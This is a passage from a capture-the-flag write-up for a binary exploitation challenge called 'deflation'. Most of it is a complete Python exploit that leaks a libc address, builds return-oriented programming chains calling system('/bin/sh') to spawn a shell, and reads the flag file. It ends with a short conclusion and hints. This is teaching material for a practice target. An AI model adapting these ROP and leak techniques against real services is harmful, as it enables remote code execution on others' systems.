        payload += pop_rdi(args[0])
    if len(args) >= 2:
        payload += pop_rsi(args[1])
    if len(args) == 3:
        payload += pop_rdx(args[2])
    payload += [address]
    return b"".join(map(p64, payload))

ropchain = call(dbg.exe.symbols["main"], [])
ropchain += call(dbg.libc.symbols["puts"], [next(dbg.libc.search(b"/bin/sh\x00"))])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
payload_3 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_3 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_3) // 8)
dbg.p.send(payload_3)

dbg.until("fread")
done = dbg.finish(wait=False)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.until("main+57")
dbg.p.recv()
dbg.c(wait=False)

dbg.p.interactive()
Full exploit
from gdb_plus import *

# args.REMOTE = True
HOST = "127.0.0.1"
PORT = 4000
binary_name = "./deflation"
context.binary = binary_name

def unzip(data):
    with context.silent:
        p = process("./inflation")
        # print("sending", data)
        p.send(data)
        p.stdin.close()
        data = p.recv()
        p.close()
    # print(data)
    return data

dbg = Debugger(context.binary).remote(HOST, PORT)

def flush(debugger):
    debugger.finish()
    debugger.call("fflush", [0])
    return False
dbg.b("fwrite", callback=flush) # Make sure to flush after each write

def shift(array, n):
    return array[n:] + array[:n]

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
payload_1 = shift(data, 94) + target
payload_1 = payload_1[-256:]

def call(address, args):
    pop_rdi = lambda value: [0x4012eb, value]
    pop_rsi = lambda value: [0x4012e9, value, 0] # pop rsi, pop r15
    payload = pop_rdi(args[0])
    if len(args) == 2:
        payload += pop_rsi(args[1])
    payload += [address]
    return b"".join(map(p64, payload))


# Compress 0x404000-0x404027 in place: 32 null bytes followed by the libc pointer at 0x404020.
ropchain = call(dbg.exe.symbols["vuln"], [0x404000, 40])
payload_2 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 8)

dbg.until("fread")
dbg.p.send(payload_1)
dbg.until("fread", loop=True)
dbg.p.recvn(279)
dbg.p.send(payload_2)

if not dbg.debugging:
    while (data := dbg.p.recv(timeout=0.5)) == b"":
        dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
    sleep(1)
else:
    done = dbg.until("main+57", wait=False)
    while not done.wait(timeout=0.5):
        dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
    dbg.p.recv()
    dbg.until("fread")


leak = unzip(dbg.p.recvn(32))
leak_libc = u64(leak[-8:])
dbg.libc.address = leak_libc - (dbg.libc.symbols["_IO_2_1_stdout_"] - dbg.libc.address)
log.success(f"base libc: {hex(dbg.libc.address)}")

dbg.until("fread", loop=True) # We are sure to have at least one more block
while dbg.p.recv(timeout=0.5) != b"":
    done = dbg.until("main+57", wait=False, loop=True)
    done.wait(timeout=3)

dbg.p.send(b"A" * 256)
done.wait()
data = dbg.p.recv()
assert unzip(data[-24:]) == b"A" * 256

dbg.p.send(payload_1)
dbg.until("main+57", loop=True)
dbg.p.recvn(279)

# Now that we have the libc we can just use it to set rdx
def call(address, args):
    pop_rdi = lambda rdi: [0x4012eb, rdi]
    pop_rsi = lambda rsi: [0x4012e9, rsi, 0] # pop rsi, pop r15
    pop_rdx = lambda rdx: [dbg.libc.address + 0xcb1cd, rdx]
    payload = []
    if len(args) >= 1:
        payload += pop_rdi(args[0])
    if len(args) >= 2:
        payload += pop_rsi(args[1])
    if len(args) == 3:
        payload += pop_rdx(args[2])
    payload += [address]
    return b"".join(map(p64, payload))

ropchain = call(dbg.exe.symbols["main"], [])
ropchain += call(dbg.libc.symbols["puts"], [next(dbg.libc.search(b"/bin/sh\x00"))])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
payload_3 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_3 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_3) // 8)
dbg.p.send(payload_3)

if not dbg.debugging:
    while (data := dbg.p.recv(timeout=0.5)) == b"":
        dbg.p.send(b"A" * 0x100)
    sleep(1)
else:
    dbg.until("fread")
    done = dbg.finish(wait=False)
    while not done.wait(timeout=0.5):
        dbg.p.send(b"A" * 0x100)
dbg.until("main+57")
dbg.p.recv()
dbg.c(wait=False)

dbg.sendline(b"cat flag.txt")
flag = dbg.recvline().decode()
log.success(f"FLAG: {flag}")
dbg.close()

Conclusion

This was a really cute challenge because of the number of ways to solve it. In particular, it reminded me of the importance of testing even desperate options that seem unlikely, and of thinking properly about what we have in front of us.

Here we focused on what I think is the solution that best justifies the difficulty rating, but if you want to try, it is also possible to exploit the challenge without relying on vuln once we have the simple buffer overflow. Have fun with it.

small hint

Remember what was our problem. We only found how to set the first two arguments of a function, but is there something we missed?

big spoiler

https://ypl.coffee/ret2csu/